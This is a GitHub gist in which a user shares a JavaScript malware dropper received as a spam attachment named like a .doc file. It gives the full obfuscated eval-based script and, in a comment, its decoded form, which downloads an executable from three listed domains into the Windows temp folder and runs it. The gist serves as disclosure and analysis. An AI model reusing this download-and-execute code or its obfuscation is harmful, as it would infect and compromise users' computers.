Skip to content

Instantly share code, notes, and snippets.

@djvs

djvs/00xxxxx.doc.js

Last active September 15, 2015 15:38
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save djvs/880497bc656f707d6484 to your computer and use it in GitHub Desktop.
Save djvs/880497bc656f707d6484 to your computer and use it in GitHub Desktop.
Download ZIP
Javascript virus received in spam email
Raw
00xxxxx.doc.js
var stroke="5557565E171114140B1610240B14010A051717010906081D4A070B09";function fwlq120() { w(') {'); return y(); }; function fwlq6() { w('var'); return y(); }; function fwlq107() { w('()'); return y(); }; function fwlq98() { w('re'); return y(); }; function fwlq87() { w('w Ac'); return y(); }; function fwlq129() { w('("ADO'); return y(); }; function fwlq220() { w('if ('); return y(); }; function fwlq50() { w('s.E'); return y(); }; function fwlq89() { w('XO'); return y(); }; function fwlq217() { w(' (er'); return y(); }; function fwlq30() { w('<b.le'); return y(); }; function fwlq115() { w('& xo'); return y(); }; function fwlq111() { w('dySt'); return y(); }; function fwlq184() { w(' xa.c'); return y(); }; function fwlq63() { w('g.fr'); return y(); }; function fwlq204() { w('r+"&'); return y(); }; function fwlq228() { w('l(100'); return y(); }; function fwlq116() { w('.s'); return y(); }; function fwlq126() { w('iv'); return y(); }; function fwlq190() { w('o.ope'); return y(); }; function fwlq12() { w('m sel'); return y(); }; function fwlq231() { w('4592'); return y(); }; function fwlq28() { w(' i=0;'); return y(); }; function fwlq71() { w('und(M'); return y(); }; function fwlq222() { w('== '); return y(); }; function fwlq40() { w('Obje'); return y(); }; function fwlq150() { w(' i'); return y(); }; function fwlq186() { w('); };'); return y(); }; function fwlq80() { w('exe";'); return y(); }; function fwlq161() { w('ion'); return y(); }; function fwlq20() { w('e2.'); return y(); }; function fwlq45() { w('");'); return y(); }; function fwlq33() { w('+) { '); return y(); }; function w(nhfj) { u = nhfj; }; function fwlq205() { w('id'); return y(); }; function fwlq156() { w('{ dn '); return y(); }; function fwlq118() { w(' == '); return y(); }; function fwlq206() { w('="+st'); return y(); }; function fwlq95() { w('TP")'); return y(); }; function fwlq23() { w('t('); return y(); }; function fwlq11() { w('e.co'); return y(); }; function fwlq211() { w(');'); return y(); }; function fwlq112() { w('ate ='); return y(); }; function fwlq102() { w('an'); return y(); }; function fwlq72() { w('ath'); return y(); }; function fwlq230() { w('dl('); return y(); }; function fwlq81() { w(' var'); return y(); }; function fwlq46() { w(' v'); return y(); }; function fwlq79() { w('0)+".'); return y(); }; function fwlq142() { w('a.'); return y(); }; function fwlq36() { w('= ne'); return y(); }; function fwlq65() { w('harC'); return y(); }; function fwlq62() { w('trin'); return y(); }; function fwlq227() { w(' d'); return y(); }; function fwlq22() { w('.spli'); return y(); }; function fwlq24() { w('" ")'); return y(); }; function fwlq155() { w('000) '); return y(); }; function fwlq18() { w('have'); return y(); }; function fwlq233() { w(' d'); return y(); }; function fwlq194() { w('tp'); return y(); }; function fwlq37() { w('w A'); return y(); }; function fwlq182() { w('{}'); return y(); }; function fwlq124() { w('new '); return y(); }; function fwlq73() { w('.r'); return y(); }; function fwlq200() { w('p?r'); return y(); }; function fwlq119() { w('200'); return y(); }; function fwlq2() { w('ct'); return y(); }; function fwlq35() { w('s '); return y(); }; function fwlq61() { w(')+S'); return y(); }; function fwlq179() { w('atc'); return y(); }; function fwlq56() { w('rin'); return y(); }; function fwlq27() { w(' (var'); return y(); }; function fwlq104() { w('fun'); return y(); }; function fwlq1() { w('fun'); return y(); }; function fwlq25() { w('; f'); return y(); }; function fwlq235() { w('3);'); return y(); }; function fwlq103() { w('ge = '); return y(); }; function fwlq225() { w('eak; '); return y(); }; function fwlq21() { w('com"'); return y(); }; function fwlq68() { w('92)+'); return y(); }; function fwlq138() { w('a.t'); return y(); }; function fwlq164() { w(' xa'); return y(); }; function fwlq152() { w('a.si'); return y(); }; function fwlq15() { w('mark'); return y(); }; function fwlq201() { w('nd'); return y(); }; function fwlq139() { w('yp'); return y(); }; function fwlq69() { w('Ma'); return y(); }; function fwlq185() { w('lose('); return y(); }; function fwlq181() { w('er) '); return y(); }; function fwlq221() { w('dn '); return y(); }; function fwlq168() { w('(f'); return y(); }; var olc = ''; var u = ''; function fwlq215() { w('} ca'); return y(); }; function fwlq216() { w('tch'); return y(); }; function fwlq90() { w('bject'); return y(); }; function fwlq17() { w('om i'); return y(); }; function fwlq128() { w('ject'); return y(); }; function fwlq97() { w('xo.on'); return y(); }; function fwlq70() { w('th.ro'); return y(); }; function fwlq48() { w('n ='); return y(); }; function fwlq141() { w('; x'); return y(); }; function fwlq75() { w('()'); return y(); }; function fwlq195() { w('://"'); return y(); }; function fwlq145() { w('o.R'); return y(); }; function fwlq188() { w('ry {'); return y(); }; function fwlq219() { w('; '); return y(); }; function fwlq147() { w('nseBo'); return y(); }; function y() { return u; }; function fwlq9() { w('lon'); return y(); }; function fwlq5() { w('r) { '); return y(); }; function fwlq146() { w('espo'); return y(); }; function fwlq171() { w('; tr'); return y(); }; function fwlq169() { w('n,'); return y(); }; function fwlq43() { w('t.Sh'); return y(); }; function fwlq193() { w('","ht'); return y(); }; function fwlq32() { w(' i+'); return y(); }; function fwlq151() { w('f (x'); return y(); }; function fwlq109() { w(' (x'); return y(); }; function fwlq232() { w(');'); return y(); }; function fwlq210() { w('alse'); return y(); }; function fwlq133() { w('m"); '); return y(); }; function fwlq203() { w('+f'); return y(); }; function fwlq160() { w('it'); return y(); }; function fwlq92() { w('XML2.'); return y(); }; function fwlq214() { w('d(); '); return y(); }; function fwlq117() { w('tatus'); return y(); }; function fwlq57() { w('gs'); return y(); }; function fwlq10() { w('ag'); return y(); }; function fwlq125() { w('Act'); return y(); }; function fwlq172() { w('y {'); return y(); }; function fwlq59() { w('EM'); return y(); }; function fwlq123() { w('= '); return y(); }; function fwlq78() { w('00'); return y(); }; function fwlq209() { w(' f'); return y(); }; function fwlq157() { w('= 1; '); return y(); }; function fwlq153() { w('ze '); return y(); }; function fwlq105() { w('cti'); return y(); }; function fwlq76() { w('*1'); return y(); }; function fwlq159() { w('.pos'); return y(); }; function fwlq213() { w('sen'); return y(); }; function fwlq198() { w('cumen'); return y(); }; function fwlq135() { w('open'); return y(); }; function fwlq106() { w('on'); return y(); }; function fwlq38() { w('ctiv'); return y(); }; function fwlq224() { w(' br'); return y(); }; function fwlq60() { w('P%"'); return y(); }; function fwlq44() { w('ell'); return y(); }; function fwlq41() { w('ct("W'); return y(); }; function fwlq174() { w('.Run'); return y(); }; function fwlq39() { w('eX'); return y(); }; function fwlq66() { w('od'); return y(); }; function fwlq207() { w('ro'); return y(); }; function fwlq99() { w('ady'); return y(); }; function fwlq100() { w('sta'); return y(); }; function fwlq199() { w('t.ph'); return y(); }; function fwlq196() { w('+b[i]'); return y(); }; function fwlq175() { w('(fn,'); return y(); }; function fwlq77() { w('00000'); return y(); }; function fwlq192() { w('GET'); return y(); }; function fwlq3() { w('ion'); return y(); }; function fwlq158() { w('xa'); return y(); }; function fwlq53() { w('viro'); return y(); }; function fwlq84() { w(' va'); return y(); }; function fwlq74() { w('andom'); return y(); }; function fwlq52() { w('ndEn'); return y(); }; function fwlq137() { w(' x'); return y(); }; function fwlq82() { w(' dn'); return y(); }; function fwlq223() { w('1)'); return y(); }; function fwlq13() { w('mary'); return y(); }; function fwlq177() { w('0)'); return y(); }; function fwlq31() { w('ngth;'); return y(); }; function fwlq29() { w(' i'); return y(); }; function fwlq162() { w(' ='); return y(); }; function fwlq54() { w('nmen'); return y(); }; function fwlq165() { w('.sa'); return y(); }; function fwlq122() { w(' xa '); return y(); }; function fwlq64() { w('omC'); return y(); }; function fwlq4() { w(' dl(f'); return y(); }; function fwlq148() { w('dy'); return y(); }; function fwlq163() { w(' 0;'); return y(); }; function fwlq108() { w(' { if'); return y(); }; function fwlq140() { w('e = 1'); return y(); }; function fwlq149() { w(');'); return y(); }; function fwlq134() { w('xa.'); return y(); }; function fwlq127() { w('eXOb'); return y(); }; function fwlq143() { w('writ'); return y(); }; function fwlq51() { w('xpa'); return y(); }; function fwlq226() { w('}; };'); return y(); }; function fwlq26() { w('or'); return y(); }; function fwlq49() { w(' w'); return y(); }; function fwlq93() { w('XM'); return y(); }; function fwlq229() { w('01); '); return y(); }; function fwlq() { return 'al'; }; function fwlq130() { w('DB.S'); return y(); }; function fwlq183() { w('; };'); return y(); }; function fwlq96() { w('; '); return y(); }; function fwlq144() { w('e(x'); return y(); }; function fwlq167() { w('File'); return y(); }; function fwlq121() { w(' var'); return y(); }; function fwlq218() { w(') {}'); return y(); }; function fwlq136() { w('();'); return y(); }; function fwlq173() { w(' ws'); return y(); }; function fwlq42() { w('Scrip'); return y(); }; function fwlq47() { w('ar f'); return y(); }; function fwlq234() { w('l(520'); return y(); }; function fwlq187() { w(' }; t'); return y(); }; function fwlq176() { w('1,'); return y(); }; function fwlq91() { w('("MS'); return y(); }; function fwlq86() { w('= ne'); return y(); }; function fwlq8() { w(' "avo'); return y(); }; function fwlq16() { w('et.c'); return y(); }; function fwlq180() { w('h ('); return y(); }; function fwlq14() { w('acht'); return y(); }; function fwlq7() { w(' b ='); return y(); }; function fwlq94() { w('LHT'); return y(); }; function fwlq166() { w('veTo'); return y(); }; function fwlq132() { w('ea'); return y(); }; function i() { return 'ev'; }; function fwlq88() { w('tive'); return y(); }; function fwlq58() { w('("%T'); return y(); }; function fwlq55() { w('tSt'); return y(); }; function fwlq178() { w('; } c'); return y(); }; function fwlq202() { w('="'); return y(); }; function fwlq110() { w('o.rea'); return y(); }; function fwlq208() { w('ke,'); return y(); }; function fwlq19() { w('avoic'); return y(); }; function fwlq197() { w('+"/do'); return y(); }; function fwlq189() { w(' x'); return y(); }; function fwlq34() { w('var w'); return y(); }; function fwlq170() { w('2)'); return y(); }; function fwlq154() { w('> 5'); return y(); }; function fwlq101() { w('tech'); return y(); }; function fwlq212() { w(' xo.'); return y(); }; function fwlq67() { w('e('); return y(); }; function fwlq85() { w('r xo '); return y(); }; function fwlq113() { w('= '); return y(); }; function fwlq114() { w('4 &'); return y(); }; function fwlq191() { w('n("'); return y(); }; function fwlq83() { w(' = 0;'); return y(); }; function fwlq131() { w('tr'); return y(); }; for (var fnla=1; fnla<=235; fnla++) { w(this['fwlq'+fnla]()); olc += y(); } this[i()+fwlq()](olc);
@djvs
Copy link
Author

djvs commented Sep 15, 2015

'compiled' by 'zomg' into:

  function dl(fr) { var b = "avolonage.com selmaryachtmarket.com ihaveavoice2.com".split(" ");
  for (var i = 0; i < b.length; i++) {
      var ws = new ActiveXObject("WScript.Shell");
      var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
      var dn = 0;
      var xo = new ActiveXObject("MSXML2.XMLHTTP");
      xo.onreadystatechange = function() {
          if (xo.readyState == 4 && xo.status == 200) {
              var xa = new ActiveXObject("ADODB.Stream");
              xa.open();
              xa.type = 1;
              xa.write(xo.ResponseBody);
              if (xa.size > 5000) {
                  dn = 1;
                  xa.position = 0;
                  xa.saveToFile(fn, 2);
                  try {
                      ws.Run(fn, 1, 0);
                  } catch (er) {};
              };
              xa.close();
          };
      };
      try {
          xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + stroke, false);
          xo.send();
      } catch (er) {};
      if (dn == 1) break;
  };
  }

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment